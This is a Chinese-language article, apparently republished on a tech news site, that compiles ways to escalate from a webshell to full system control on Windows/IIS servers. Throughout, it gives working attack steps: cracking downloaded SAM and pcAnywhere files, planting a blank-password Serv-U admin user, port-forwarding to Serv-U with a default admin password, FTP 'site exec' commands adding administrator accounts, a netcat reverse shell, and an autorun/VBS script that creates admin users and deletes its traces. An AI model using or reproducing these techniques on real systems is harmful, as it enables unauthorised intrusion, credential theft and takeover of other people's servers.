自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

最全的Webshell提權(quán)方法總結(jié)

安全 應(yīng)用安全
在得到了一個(gè)Webshell之后,如果能進(jìn)一步利用系統(tǒng)的配置不當(dāng)取得更高的權(quán)限,一直是廣大黑友們所津津樂道的話題,也是高手和菜鳥間最大的區(qū)別。本文將從一個(gè)大角度總括當(dāng)前流行的各種提權(quán)方法,希望對(duì)大家有所啟發(fā),起到一個(gè)拋磚引玉的作用。

在得到了一個(gè)Webshell之后,如果能進(jìn)一步利用系統(tǒng)的配置不當(dāng)取得更高的權(quán)限,一直是廣大黑友們所津津樂道的話題,也是高手和菜鳥間最大的區(qū)別。本文將從一個(gè)大角度總括當(dāng)前流行的各種提權(quán)方法,希望對(duì)大家有所啟發(fā),起到一個(gè)拋磚引玉的作用。

WEBSHELL權(quán)限提升技巧 
c: d: e:..... 
C:\Documents and Settings\All Users\「開始」菜單\程序\ 
看這里能不能跳轉(zhuǎn),我們從這里可以獲取好多有用的信息比如Serv-U的路徑, 
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 
看能否跳轉(zhuǎn)到這個(gè)目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸 
c:\Program Files\serv-u\ 
C:\WINNT\system32\config\ 
下它的SAM,破解密碼 
c:\winnt\system32\inetsrv\data\ 
是erveryone 完全控制,很多時(shí)候沒作限制,把提升權(quán)限的工具上傳上去,然后執(zhí)行 
c:\prel 
C:\Program Files\Java Web Start\ 
c:\Documents and Settings\ 
C:\Documents and Settings\All Users\ 
c:\winnt\system32\inetsrv\data\ 
c:\Program Files\ 
c:\Program Files\serv-u\ BBS.bitsCN.com國內(nèi)最早的網(wǎng)管論壇 
C:\Program Files\Microsoft SQL Server\ 
c:\Temp\ 
c:\mysql\(如果服務(wù)器支持PHP) 
c:\PHP(如果服務(wù)器支持PHP) 
運(yùn)行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限 
還可以用這段代碼試提升,好象不是很理想的 
如果主機(jī)設(shè)置很變態(tài),可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)"寫入bat,vbs等木馬。 
根目錄下隱藏autorun.inf 
C:\PROGRAM FILES\KV2004\ 綁 
D:\PROGRAM FILES\RISING\RAV\ 
C:\Program Files\Real\RealServer\ 
rar 
Folder.htt與desktop.ini 
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對(duì)方管理員最可能瀏覽的目錄下 
replace 替換法 捆綁 
腳本 編寫一個(gè)啟動(dòng)/關(guān)機(jī)腳本 重起 
刪SAM :( 錯(cuò) 
CAcls命令 
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak 
Ring的權(quán)限提升21大法! 
以下全部是本人提權(quán)時(shí)候的總結(jié) 很多方法至今沒有機(jī)會(huì)試驗(yàn)也沒有成功,但是我是的確看見別人成功過 
的。本人不才,除了第一種方法自己研究的,其他的都是別人的經(jīng)驗(yàn)總結(jié)。希望對(duì)朋友有幫助! 

1.radmin連接法 
條件是你權(quán)限夠大,對(duì)方連防火墻也沒有。封裝個(gè)radmin上去,運(yùn)行,開對(duì)方端口,然后radmin上去  。本人從來米成功過,端口到是給對(duì)方打開了。

2.paanywhere 
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF 
文件,在本地安裝pcanywhere上去 

3.SAM破解 
C:\WINNT\system32\config\ 下他的SAM 破解之 

4.SU密碼奪取 
C:\Documents and Settings\All Users\「開始」菜單\程序\ 
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉(zhuǎn) 
進(jìn)去后,如果有權(quán)限修改ServUDaemon.ini,加個(gè)用戶上去,密碼為空 
[USER=WekweN|1] 
Password= 
HomeDir=c:\ 
TimeOut=600 
Maintenance=System 
Access1=C:\|RWAMELCDP 
Access1=d:\|RWAMELCDP 
Access1=f:\|RWAMELCDP 
SKEYvalues= 
這個(gè)用戶具有最高權(quán)限,然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限 

5.c:\winnt\system32\inetsrv\data\ 
引用:就是這個(gè)目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權(quán)限的工具上傳上去, 
然后執(zhí)行 

6.SU溢出提權(quán) 
這個(gè)網(wǎng)上教程N(yùn)多 不詳細(xì)講解了 

7.運(yùn)行Csript 
引用:運(yùn)行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提 
升權(quán)限 
用這個(gè)cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 
查看有特權(quán)的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 
再將asp.dll加入特權(quán)一族 
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機(jī)子放的位置不一定一樣) 
我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" 
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 
\inetsrv\asp.dll" 
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去了

8.腳本提權(quán) 
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)"寫入bat,vbs 

9.VNC 
這個(gè)是小花的文章 HOHO 
默認(rèn)情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password 

我們可以用vncx4 
破解它,vncx4使用很簡(jiǎn)單,只要在命令行下輸入 
c:\>vncx4 -W 
然后順序輸入上面的每一個(gè)十六進(jìn)制數(shù)據(jù),沒輸完一個(gè)回車一次就行了。

10.NC提權(quán) 
給對(duì)方來個(gè)NC 但是條件是你要有足夠的運(yùn)行權(quán)限 然后把它反彈到自己的電腦上 HOHO OK了 

11.社會(huì)工程學(xué)之GUEST提權(quán) 
很簡(jiǎn)單 查看他的擁護(hù) 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號(hào) 郵 
箱號(hào) 手機(jī)號(hào) 盡量看看 HOHO 

12.IPC空連接 
如果對(duì)方真比較白癡的話 掃他的IPC 如果運(yùn)氣好還是弱口令 

13.替換服務(wù) 
這個(gè)不用說了吧?個(gè)人感覺相當(dāng)復(fù)雜 

14.autorun .inf 
autorun=xxx.exe 這個(gè)=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性 傳到哪個(gè)盤都可以的 不相信 
他不運(yùn)行 

15.desktop.ini與Folder.htt 
引用:首先,我們現(xiàn)在本地建立一個(gè)文件夾,名字不重要,進(jìn)入它,在空白處點(diǎn)右鍵,選擇"自定義 
文件夾"(xp好像是不行的)一直下點(diǎn),默認(rèn)即可。完成后,你就會(huì)看到在此目錄下多了兩個(gè)名為Folder 
setting的文件架與desktop.ini的文件,(如果你看不到,先取消"隱藏受保護(hù)的操作系統(tǒng)文件")然后 
我們?cè)贔older setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼: ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后門文件名"> 
然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對(duì)方 
任意一個(gè)目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的后門 

16.su覆蓋提權(quán) 
本地安裝個(gè)su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重 
起一下Serv-U,于是你上面的所有配置都與他的一模一樣了 

17.SU轉(zhuǎn)發(fā)端口 
43958這個(gè)是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執(zhí)行命令: Fpipe –v –l 3333 –r 
43958 127.0.0.1 意思是將4444端口映射到43958端口上。 然后就可以在本地安裝一個(gè)Serv-u,新建一個(gè) 
服務(wù)器,IP填對(duì)方IP,帳號(hào)為L(zhǎng)ocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的 
Serv-u了 

18.SQL帳戶密碼泄露 
如果對(duì)方開了MSSQL服務(wù)器,我們就可以通過用SQL連接器加管理員帳號(hào)(可以從他的連接數(shù)據(jù)庫的 
ASP文件中看到),因?yàn)镸SSQL是默認(rèn)的SYSTEM權(quán)限。 
引用:對(duì)方?jīng)]有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對(duì)方IP,User與Pass DL.bitsCN.com網(wǎng)管軟件下載 
中填入你所得到的用戶名與密碼。format選擇xp_cmdshell"%s"即可。然后點(diǎn)擊connect,連接上后就可 
以在CMD一欄中輸入你想要的CMD命令了 

19.asp.dll 
引用:因?yàn)閍sp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機(jī)子放的位置不一定相同 

我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" 
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 
\inetsrv\asp.dll" 
好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去 
了,注意,用法中的get和set,一個(gè)是查看一個(gè)是設(shè)置.還有就是你運(yùn)行上面的你要到 
C:\Inetpub\AdminScripts>這個(gè)目錄下. 
那么如果你是一個(gè)管理員,你的機(jī)子被人用這招把a(bǔ)sp提升為system權(quán)限,那么,這時(shí),防的方法就是把 
asp.dll T出特權(quán)一族,也就是用set這個(gè)命令,覆蓋掉剛才的那些東東. 

20.Magic Winmail 
前提是你要有個(gè)webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587這里去看吧 

21.DBO…… 
其實(shí) 提升權(quán)限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務(wù)器控制到底! 
感謝noangel 
WEBSHELL權(quán)限提升 
動(dòng)網(wǎng)上傳漏洞,相信大家拿下不少肉雞吧,但是都是WEBSHELL,不能拿到系統(tǒng)權(quán)限,要如何拿到系統(tǒng)權(quán)限呢?這正是我們這次要討論的內(nèi)容 
OK,進(jìn)入我的WEBSHELL 
啊哈,不錯(cuò),雙CPU,速度應(yīng)該跟的上,不拿下你我怎么甘心啊 
輸入密碼,進(jìn)入到里面看看,有什么好東西沒有,翻了下,好像也沒有什么特別的東西,看看能不能進(jìn)到其他的盤符,點(diǎn)了下C盤,不錯(cuò)不錯(cuò),可以進(jìn)去,這樣提升就大有希望了

一 serv-u提升 
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,記得有次看到SERV-U有默認(rèn)的用戶名和密碼,但是監(jiān)聽的端口是43958,而且是只有本地才能訪問的,但是我們有端口轉(zhuǎn)發(fā)工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21 
顯示竟然是3.0的,唉,不得不說這個(gè)管理員真的不稱職。后來完畢后掃描了下,也只有FTP的洞沒有補(bǔ)。既然是這樣,我們就開始我們的提升權(quán)限了 
上傳FPIPE,端口轉(zhuǎn)發(fā)工具, 圖三 
在運(yùn)行CMD命令里輸入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機(jī)的43598端口轉(zhuǎn)發(fā)到81端口 

然后打開我們自己機(jī)子上的SERV-U,點(diǎn)Serv-U服務(wù)器,點(diǎn)菜單欄上的的服務(wù)器,點(diǎn)新建服務(wù)器,然后輸入IP,輸入端口,記得端口是剛剛我們轉(zhuǎn)發(fā)的 81端口。服務(wù)名稱隨便你喜歡,怎么樣都行。然后是用戶名:LocalAdministrator 密碼:#l@$ak#.lk;0@P (密碼都是字母) 
確定,然后點(diǎn)剛剛建的服務(wù)器,然后就可以看到已有的用戶,自己新建一個(gè)用戶,把所有權(quán)限加上。也不鎖定根目錄 
接下來就是登陸了,登陸FTP一定要在CMD下登陸, 
進(jìn)入后一般命令和DOS一樣,添加用戶的時(shí)候 
ftp>quote site exec net.exe user hk pass /add 
ftp>quote site exec net.exe localgroup administrators hk/add 
如果對(duì)方開了3389的話,就不用我教你怎么做了,沒開的話,新建立IPC連接,在上傳木馬或者是開啟3389的工具 
二 
auto.ini 加 SHELL.VBS 
autorun.inf 
[autorun] 
open=shell.vbs 
shell.vbs 
dim wsh 
set wsh=createObject("WScript.Shell") 
wsh.run "net user guest /active:yes",0 
wsh.run "net user guest 520ls",0 
wsh.run "net localgroup administrators guest /add",0 
wsh.run "net user hkbme 520ls /add",0 


wsh.run "net localgroup administrators hkbme /add",0 
wsh.run "cmd.exe /c del autorun.inf",0 
wsh.run "cmd.exe /c del shell.vbs",0 

但是這樣要可以訪問到對(duì)方的根目錄。將這兩個(gè)文件放到對(duì)方硬盤的根目錄下。當(dāng)然你也可以直接執(zhí)行木馬程序,還要一個(gè)木馬程序,但是語句就和最后兩句一樣,通過CMD執(zhí)行木馬程序 

三 
Folder.htt與desktop.ini 
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對(duì)方管理員最可能瀏覽的目錄下,覺得一個(gè)不夠,可以多放幾個(gè) 
Folder.htt添加代碼 
 
 
但是后門和這兩個(gè)文件必須要放到一塊,有點(diǎn)問題,可以結(jié)合啟動(dòng)VBS,運(yùn)行結(jié)束后,刪除上傳的后門.就是CODEBASE="shell.vbs".shell寫法如上 

四 
replace 
替換法,可以替換正在執(zhí)行的文件。用這個(gè)幾乎可以馬上得到權(quán)限,但是我沒有做過試驗(yàn),可以試下,將對(duì)方正在執(zhí)行的文件替換為和它文件名一樣的,捆綁了木馬的。為什么不直接替換木馬呢?如果替換的是關(guān)鍵程序,那不是就直接掛了?所以還是捆綁好點(diǎn) www.bitsCN.net網(wǎng)管博客等你來搏
格式 
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] 
[/R] [/W] 
REPLACE [drive1:][path1]filename [drive2:][path2] 
[/R] [/S] [/W] 
 [drive1:][path1]filename 指定源文件。 
 [drive2:][path2] 指定要替換文件的 
  目錄。 
 /A 把新文件加入目標(biāo)目錄。不能和 
  /S 或 /U 命令行開關(guān)搭配使用。 
 /P 替換文件或加入源文件之前會(huì)先提示您 
  進(jìn)行確認(rèn)。 
 /R 替換只讀文件以及未受保護(hù)的 
  文件。 
 /S 替換目標(biāo)目錄中所有子目錄的文件。 
  不能與 /A 命令選項(xiàng) 
  搭配使用。 
 /W 等您插入磁盤以后再運(yùn)行。 
 /U 只會(huì)替換或更新比源文件日期早的文件。 
  不能與 /A 命令行開關(guān)搭配使用 
這個(gè)命令沒有試驗(yàn)過,看能不能替換不能訪問的文件夾下的文件,大家可以試驗(yàn)下 

五 
腳本 
編寫一個(gè)啟動(dòng)/關(guān)機(jī)腳本配置文件scripts.ini,這個(gè)文件名是固定的,不能改變。內(nèi)容如下: 
[Startup] 


0CmdLine=a.bat 
0Parameters= 
將文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts" 
A.BAT的內(nèi)容可以是NET USER yonghu mima 
也可以是NET USER ADMINistrator XXX 
這樣可以恢復(fù)你想要得任意用戶名的密碼,也可以自己增加新的用戶,但是要依賴重啟,還有就是對(duì)SYSTEM32有寫的權(quán)限

六 
SAM 
如果可以訪問對(duì)方的SYSTEM32的話,刪除對(duì)方的SAM文件,等他重啟以后就是ADMIN用戶密碼為空 
突然又有了想法,可以用REPLACE命令替換的嗎,可以把你的SAM文件提取出來,上傳到他的任意目錄下,然后替換。不過不知道如果對(duì)SYSTEM32沒有權(quán)限訪問的話,能不能實(shí)現(xiàn)替換。

【編輯推薦】

  1. 黑客網(wǎng)絡(luò)入侵大型網(wǎng)站的完整思路
  2. php注入后的提權(quán)
責(zé)任編輯:Oo小孩兒 來源: 安全中國網(wǎng)
相關(guān)推薦

2023-06-11 17:24:26

2019-12-01 22:34:42

提權(quán)web安全漏洞

2016-12-12 09:11:20

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2011-03-07 11:36:23

FileZillaSe

2013-10-18 10:10:45

Linux漏洞代碼提權(quán)

2021-01-06 08:04:30

Linux方式提權(quán)

2021-01-13 08:14:36

Windows提權(quán)漏洞攻擊

2021-05-01 20:52:30

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2013-11-29 15:34:00

2015-09-22 10:25:13

2010-11-02 21:17:17

2009-08-07 10:18:13

Linux反彈CmdLine S技巧

2017-03-25 20:30:15

2015-03-13 10:06:55

2024-07-31 08:46:10

2009-07-25 17:24:45

2012-11-15 13:44:36

Plesk密碼提權(quán)密碼

2024-01-15 00:25:59

2018-07-05 10:44:09

Windows提權(quán)漏洞
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)